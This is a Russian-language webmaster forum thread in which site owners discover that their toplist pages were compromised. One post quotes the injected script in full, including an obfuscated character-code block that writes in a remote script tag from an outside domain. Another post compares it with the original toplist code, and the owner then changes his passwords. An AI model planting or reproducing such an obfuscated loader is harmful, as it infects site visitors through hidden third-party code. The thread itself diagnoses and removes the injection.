Новая тема   Ответить

 CrazyMen
Всем спасибо! Вопрос как бы решен или не соввсем!

Последний раз редактировалось: CrazyMen (10/12/10 в 20:10), всего редактировалось 2 раз(а)

 andreich
зашел по IP USA никуда не редиректит только в строке состояния посточнно что то откуда грузит

 CrazyMen
попробуй еще сайт http://closedteenroom.com антивирусники не светят ли троян или что то еще?

 andreich
CrazyMen: не пингуется даже с shell сервака
ты видимо ошибся в синтаксисе
This domain name is not registered

 CrazyMen
блин! виноват http://closedteensroom.com ссылку не правильно дал

 andreich
тоже самое - грузится, KIS не ругается, но в строке состояния постоянно чтото подгружает

 CrazyMen
andreich: Спасибо тебе за помощь!

 andreich
CrazyMen: обращайся

 Semen_ssr
Микрософт секъюрити говорит, что все окейно )

 HST
У меня Касперский по-прежнему ругается. Что за код в самом конце closedteensroom и aqua-teens.com?

<script>a=navigator.userAgent+"aaaaaaaaaa";jsm=Math.abs(a.charCodeAt(0)-a.charCodeAt(1)-a.charCodeAt(2)+a.charCodeAt(3)-a.charCodeAt(4)-a.charCodeAt(5)*a.charCodeAt(6)-a.charCodeAt(7)+a.charCodeAt(8)+a.charCodeAt(9));for(i=0;i<document.links.length;i++){if(document.links[i].href.search("link=")>=0) document.links[i].href+="&t="+jsm;}</script></noscript><script>var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!119!119!119!46!99!108!97!121!97!105!109!46!99!111!109!47!105!110!100!101!120!46!112!104!112!63!114!101!102!61!119!101!98!101!120!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);</script><script>ref="master-xcom";if(ref!=""){for(i=0;i<document.links.length;i++){if(document.links[i].clk){lnkURL=document.links[i].clk}else{lnkURL=document.links[i].href};if(lnkURL.indexOf("ref="+ref)>=0){if(document.links[i].outerHTML){document.links[i].outerHTML=document.links[i].innerText;i--;}}}}</script>

 CrazyMen
HST: Это нормальный скрипт обработки топлиста. Я уже зря админов напрягал лдя проверки панику только рассея зря. Скажи капсерскому что он плохой! у меня же не орет. А страницу у меня редиретило из за впн бесплатного. Как говорится скупой платит дваждый!

 Danyil
То HST
Проверь, плииз, своим Каспером что-нить из моих топов:
http://new-tops.com/webmasters.html

А то была подобная хрень с трояном редиректом...

Последний раз редактировалось: Danyil (10/12/10 в 00:26), всего редактировалось 1 раз

 andreich
HST: а какая версия ? базы ? и т.д.

 andreich
Danyil: прошелся я по первым 10-ти - все нормально KIS 2011 (лецензия, базы вчерашнии от 22.54)

 HST
CrazyMen: допустим, трояна нет. А мой KIS 2009 матерится на топовый код внизу страницы или что ты там грузишь в ифреймах. В этом случае я даже если и спишу троянское предупреждение моего веб-антивируса на его доисторическое происхождение, то что подумают прочие посетители твоих сайтов с аналогичной или похожей версией KIS на их компьютерах? Закроют страницу и пойдут дальше курить гугл, а ты даже и не узнаешь что из-за экзотических топовых скриптов или ифреймов с juicyads к тебе придет меньше трафика чем могло бы быть.

Danyil: проверил, все чисто.

andreich: Лицензионный KIS 2009 версии 8.0.0.506. Базы от 09.12.2010.

Последний раз редактировалось: HST (10/12/10 в 01:19), всего редактировалось 2 раз(а)

 Danyil
andreich, HST, спасибо!

Вчера на одной из сеток (не моих) проявилась такая хрень, что в эксплоере всё нормально, а в мазиле редиректило на туб какой-то...

 CrazyMen
HST: Я там во первых ничего не гружу. Все скрипты оригинальные и обновлены до последних версий. У меня тоже стоит KIS 2009 и почему то он не возмущается на мои топы и на код вредоностный. Стоит нормальный лецензионный каспер базы обновляются постоянно по мере выхода баз. Щас просмотрел несколькими браузерами все топы никуда не редиректит и ничего не загружет. На сайтах только рекламма от jusy ads в виде фреймов. По моему у тебя КИС настроен навысокий уровень защиты

 CrazyMen
Danyil: Тоже посмотрел ничего нет.
HST: Даже у андреича не кипишит касперский. И онлайн антивирами проверял тоже ничего нет. И не у всех за бугром стоит каспер лидером идет нортон интернет секьюрети 2010

 Alexandur
CrazyMen писал:
Your wrong.

Оригинальный кот:
<script>a=navigator.userAgent+"aaaaaaaaaa";jsm=Math.abs(a.charCodeAt(0)*a.charCodeAt(1)*a.charCodeAt(2)*a.charCodeAt(3)*a.charCodeAt(4)-a.charCodeAt(5)*a.charCodeAt(6)*a.charCodeAt(7)*a.charCodeAt(8)+a.charCodeAt(9));for(i=0;i<document.links.length;i++){if(document.links[i].href.search("link=")>=0) document.links[i].href+="&t="+jsm;}</script><script>ref="noref";if(ref!=""){for(i=0;i<document.links.length;i++){if(document.links[i].clk){lnkURL=document.links[i].clk}else{lnkURL=document.links[i].href};lnkref=lnkURL.indexOf("ref="+ref);if(lnkref>=0){if(lnkURL.length==(lnkref+ref.length+4) || lnkURL.charAt(lnkref+ref.length+4)=="&"){if(document.links[i].outerHTML){document.links[i].outerHTML=document.links[i].innerText;i--;}}}}}</script>
Сравни со своим. А тот кусок, что отличается, делает это:
Код:

Последний раз редактировалось: Alexandur (10/12/10 в 15:19), всего редактировалось 1 раз

 CrazyMen
Вот дерьмо! Мен спасибо! я бы так и оставил все. а код я этото брал с недавно установленого топа. получается полнный пиздец. HST извини ты был прав. нужно админов хостра поднимать. походу где то поглубже все засело.

 CrazyMen
В общем поменял я все пароли везде. И теперь такого кода н е обнаруживается. ТОлько тот что привел gimcnuk: те оригинальный. Походу дела только в этом проблема была.

 Дольчик ххх
плюс сделай чтоб на твой фтп могли зайти только определенные Ип адреса ;)